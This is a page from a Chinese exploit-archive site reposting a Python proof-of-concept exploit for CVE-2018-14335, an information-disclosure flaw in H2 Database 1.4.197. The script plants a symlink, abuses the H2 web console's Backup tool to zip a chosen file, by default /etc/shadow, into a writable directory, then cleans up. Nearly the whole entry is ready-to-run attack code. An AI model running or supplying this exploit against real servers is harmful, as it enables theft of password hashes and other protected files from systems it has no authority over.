首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
H2 Database 1.4.197 Information Disclosure
来源:vfocus.net 作者:owodelta 发布时间:2018-07-31  
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
 
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
 
# PS, thanks to HTB and our team FallenAngels
 
#!/usr/bin/python
 
import requests
import argparse
import os
import random
 
def cleanup(wdir):
    cmd = "rm {}symlink.trace.db".format(wdir)
    os.system(cmd)
 
def create_symlink(file, wdir):
    cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
    os.system(cmd)
 
 
def trigger_symlink(host, wdir):
    outputName = str(random.randint(1000,10000))+".zip"
    #get cookie
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
    url = '{}/{}'.format(url,path)
    payload = {
            "tool":"Backup",
            "args":"-file,"+wdir+outputName+",-dir,"+wdir}
    #print url
    requests.post(url,data=payload).text
    print "File is zipped in: "+wdir+outputName
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    required = parser.add_argument_group('required arguments')
    required.add_argument("-H",
            "--host",
            metavar='127.0.0.1:8082',
            help="Target host",
            required=True)
    required.add_argument("-D",
            "--dir",
            metavar="/tmp/",
            default="/tmp/",
            help="Writable directory")
    required.add_argument("-F",
            "--file",
            metavar="/etc/shadow",
            default="/etc/shadow",
            help="Desired file to read",)
    args = parser.parse_args()
 
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Kernel win32
·fusermount Restriction Bypass
·Allok MOV Converter 4.6.1217 B
·Charles Proxy 4.2 Local Root P
·ipPulse 1.92 Denial Of Service
·Vtiger CRM 6.3.0 Authenticated
·ipPulse 1.92 - 'IP Address/Hos
·SonicWall Global Management Sy
·WordPress Plugin Responsive Th
·MicroFocus Secure Messaging Ga
·NetScanTools Basic Edition 2.5
·Switch Port Mapping Tool 2.81
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved